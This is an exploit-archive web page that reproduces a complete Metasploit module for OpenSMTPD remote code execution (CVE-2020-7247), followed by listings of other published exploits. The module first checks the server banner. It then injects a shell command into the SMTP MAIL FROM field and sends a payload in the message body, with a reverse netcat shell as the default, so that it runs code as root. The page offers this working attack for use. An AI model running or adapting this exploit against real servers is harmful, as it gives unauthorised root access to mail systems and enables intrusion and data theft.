Menu

Search for hundreds of thousands of exploits

"OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)"

Author

Exploit author

Metasploit

Platform

Exploit platform

linux

Release date

Exploit published date

2020-02-10

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Expect

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'OpenSMTPD MAIL FROM Remote Code Execution',
      'Description'    => %q{
        This module exploits a command injection in the MAIL FROM field during
        SMTP interaction with OpenSMTPD to execute code as the root user.
      },
      'Author'         => [
        'Qualys',                               # Discovery and PoC
        'wvu',                                  # Module
        'RageLtMan <rageltman[at]sempervictus>' # Module
      ],
      'References'     => [
        ['CVE', '2020-7247'],
        ['URL', 'https://www.openwall.com/lists/oss-security/2020/01/28/3']
      ],
      'DisclosureDate' => '2020-01-28',
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Privileged'     => true,
      'Targets'        => [
        ['OpenSMTPD >= commit a8e222352f',
          'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars
        ]
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
    ))

    register_options([
      Opt::RPORT(25),
      OptString.new('RCPT_TO', [true, 'Valid mail recipient', 'root'])
    ])

    register_advanced_options([
      OptBool.new('ForceExploit',   [false, 'Override check result', false]),
      OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
    ])
  end

  def check
    connect
    res = sock.get_once

    return CheckCode::Unknown unless res
    return CheckCode::Detected if res =~ /^220.*OpenSMTPD/

    CheckCode::Safe
  rescue EOFError, Rex::ConnectionError => e
    vprint_error(e.message)
    CheckCode::Unknown
  ensure
    disconnect
  end

  def exploit
    unless datastore['ForceExploit']
      unless check == CheckCode::Detected
        fail_with(Failure::Unknown, 'Set ForceExploit to override')
      end
    end

    # We don't care who we are, so randomize it
    me = rand_text_alphanumeric(8..42)

    # Send mail to this valid recipient
    to = datastore['RCPT_TO']

    # Comment "slide" courtesy of Qualys - brilliant!
    iter = rand_text_alphanumeric(15).chars.join(' ')
    from = ";for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;"

    # This is just insurance, since the code was already written
    if from.length > 64
      fail_with(Failure::BadConfig, 'MAIL FROM field is greater than 64 chars')
    elsif (badchars = (from.chars & target['MyBadChars'])).any?
      fail_with(Failure::BadConfig, "MAIL FROM field has badchars: #{badchars}")
    end

    # Create the mail body with comment slide and payload
    body = "\r\n" + "#\r\n" * 15 + payload.encoded

    sploit = {
      nil                   => /220.*OpenSMTPD/,
      "HELO #{me}"          => /250.*pleased to meet you/,
      "MAIL FROM:<#{from}>" => /250.*Ok/,
      "RCPT TO:<#{to}>"     => /250.*Recipient ok/,
      'DATA'                => /354 Enter mail.*itself/,
      body                  => nil,
      '.'                   => /250.*Message accepted for delivery/,
      'QUIT'                => /221.*Bye/
    }

    print_status('Connecting to OpenSMTPD')
    connect

    print_status('Saying hello and sending exploit')
    sploit.each do |line, pattern|
      send_expect(
        line,
        pattern,
        sock:    sock,
        timeout: datastore['ExpectTimeout'],
        newline: "\r\n"
      )
    end
  rescue Rex::ConnectionError => e
    fail_with(Failure::Unreachable, e.message)
  rescue Timeout::Error => e
    fail_with(Failure::TimeoutExpired, e.message)
  ensure
    disconnect
  end

end
Release DateTitleTypePlatformAuthor
2020-04-03"AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)"localwindowsHodorsec
2020-04-03"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution"webappsphp"Basim Alabdullah"
2020-04-02"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)"localwindows"Paras Bhatia"
2020-04-01"DiskBoss 7.7.14 - Denial of Service (PoC)"doswindows"Paras Bhatia"
2020-04-01"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)"localwindowsHodorsec
2020-03-31"Redis - Replication Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-31"SharePoint Workflows - XOML Injection (Metasploit)"remotewindowsMetasploit
2020-03-31"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-31"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)"remotemultipleMetasploit
2020-03-31"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-31"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)"doswindows"Paras Bhatia"
2020-03-31"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)"remotehardwareMetasploit
2020-03-30"Zen Load Balancer 3.10.1 - Remote Code Execution"webappscgi"Cody Sixteen"
2020-03-30"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation"localwindows"Daniel García Gutiérrez"
2020-03-30"Multiple DrayTek Products - Pre-authentication Remote Root Code Execution"remotelinux0xsha
2020-03-30"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)"localwindowsHodorsec
2020-03-30"Joomla! com_fabrik 3.9.11 - Directory Traversal"webappsphpqw3rTyTy
2020-03-30"Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-27"Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal"webappsjavahongphukt
2020-03-27"rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution"webappsphpvikingfr
2020-03-27"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-27"ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)"webappsphp"Mustafa Emre Gül"
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-26"TP-Link Archer C50 3 - Denial of Service (PoC)"webappshardwarethewhiteh4t
2020-03-26"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution"webappsphp"Engin Demirbilek"
2020-03-25"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-25"Joomla! Component GMapFP 3.30 - Arbitrary File Upload"webappsphpThelastVvV
2020-03-25"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path"localwindows"Felipe Winsnes"
2020-03-25"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting"webappsphpSunCSR
2020-03-25"AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path"localwindows"Roberto Piña"
Release DateTitleTypePlatformAuthor
2020-03-31"Redis - Replication Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-30"Multiple DrayTek Products - Pre-authentication Remote Root Code Execution"remotelinux0xsha
2020-03-17"Rconfig 3.x - Chained Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-13"Centos WebPanel 7 - 'term' SQL Injection"webappslinux"Berke YILMAZ"
2020-03-10"Nagios XI - Authenticated Remote Command Execution (Metasploit)"remotelinuxMetasploit
2020-03-09"OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)"locallinuxMetasploit
2020-03-02"netkit-telnet-0.17 telnetd (Fedora 31) - 'BraveStarr' Remote Code Execution"remotelinuxImmunity
2020-02-26"OpenSMTPD 6.6.3 - Arbitrary File Read"remotelinux"Qualys Corporation"
2020-02-24"Diamorphine Rootkit - Signal Privilege Escalation (Metasploit)"locallinuxMetasploit
2020-02-24"Go SSH servers 0.0.2 - Denial of Service (PoC)"doslinux"Mark Adams"
2020-02-24"Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)"remotelinuxMetasploit
2020-02-10"OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-02-10"usersctp - Out-of-Bounds Reads in sctp_load_addresses_from_init"doslinux"Google Security Research"
2020-02-06"VIM 8.2 - Denial of Service (PoC)"doslinux"Dhiraj Mishra"
2020-02-06"Sudo 1.8.25p - 'pwfeedback' Buffer Overflow"locallinux"Dylan Katz"
2020-02-05"Socat 1.7.3.4 - Heap-Based Overflow (PoC)"locallinuxhieubl
2020-02-05"xglance-bin 11.00 - Privilege Escalation"locallinuxredtimmysec
2020-02-04"Sudo 1.8.25p - Buffer Overflow"locallinux"Joe Vennix"
2020-02-04"F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)"webappslinux"Kevin Joensen"
2020-02-03"BearFTP 0.1.0 - 'PASV' Denial of Service"doslinuxkolya5544
2020-01-30"OpenSMTPD 6.6.2 - Remote Code Execution"remotelinux1F98D
2020-01-23"Reliable Datagram Sockets (RDS) - rds_atomic_free_op NULL pointer dereference Privilege Escalation (Metasploit)"locallinuxMetasploit
2020-01-23"Pachev FTP Server 1.0 - Path Traversal"remotelinux1F98D
2020-01-15"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)"remotelinuxMetasploit
2020-01-14"Redir 3.3 - Denial of Service (PoC)"doslinuxhieubl
2020-01-10"ASTPP 4.0.1 VoIP Billing - Database Backup Download"webappslinux"Fabien AUNAY"
2020-01-08"ASTPP VoIP 4.0.1 - Remote Code Execution"remotelinux"Fabien AUNAY"
2019-12-30"Reptile Rootkit - reptile_cmd Privilege Escalation (Metasploit)"locallinuxMetasploit
2019-12-18"OpenMRS - Java Deserialization RCE (Metasploit)"remotelinuxMetasploit
2019-12-16"Linux 5.3 - Privilege Escalation via io_uring Offload of sendmsg() onto Kernel Thread with Kernel Creds"locallinux"Google Security Research"
Release DateTitleTypePlatformAuthor
2020-03-31"Redis - Replication Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-31"SharePoint Workflows - XOML Injection (Metasploit)"remotewindowsMetasploit
2020-03-31"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)"remotehardwareMetasploit
2020-03-31"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)"remotemultipleMetasploit
2020-03-17"Rconfig 3.x - Chained Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-17"ManageEngine Desktop Central - Java Deserialization (Metasploit)"remotemultipleMetasploit
2020-03-10"Nagios XI - Authenticated Remote Command Execution (Metasploit)"remotelinuxMetasploit
2020-03-10"PHPStudy - Backdoor Remote Code execution (Metasploit)"remotephpMetasploit
2020-03-09"OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)"locallinuxMetasploit
2020-03-09"PHP-FPM - Underflow Remote Code Execution (Metasploit)"remotephpMetasploit
2020-03-09"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)"remotemultipleMetasploit
2020-03-09"Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit)"remotewindowsMetasploit
2020-03-09"Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)"remotemultipleMetasploit
2020-03-09"Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)"remotemultipleMetasploit
2020-03-05"EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)"remotemultipleMetasploit
2020-03-05"Exchange Control Panel - Viewstate Deserialization (Metasploit)"remotewindowsMetasploit
2020-02-24"Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)"remotelinuxMetasploit
2020-02-24"Android Binder - Use-After-Free (Metasploit)"localandroidMetasploit
2020-02-24"Diamorphine Rootkit - Signal Privilege Escalation (Metasploit)"locallinuxMetasploit
2020-02-17"Anviz CrossChex - Buffer Overflow (Metasploit)"remotewindowsMetasploit
2020-02-11"WordPress InfiniteWP - Client Authentication Bypass (Metasploit)"webappsphpMetasploit
2020-02-10"Ricoh Driver - Privilege Escalation (Metasploit)"localwindowsMetasploit
2020-02-10"D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)"remotelinux_mipsMetasploit
2020-02-10"OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-02-07"Windscribe - WindscribeService Named Pipe Privilege Escalation (Metasploit)"localwindowsMetasploit
2020-01-23"Reliable Datagram Sockets (RDS) - rds_atomic_free_op NULL pointer dereference Privilege Escalation (Metasploit)"locallinuxMetasploit
2020-01-17"Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit)"localwindowsMetasploit
2020-01-15"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)"remotelinuxMetasploit
2019-12-30"Microsoft UPnP - Local Privilege Elevation (Metasploit)"localwindowsMetasploit
2019-12-30"Reptile Rootkit - reptile_cmd Privilege Escalation (Metasploit)"locallinuxMetasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48038/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse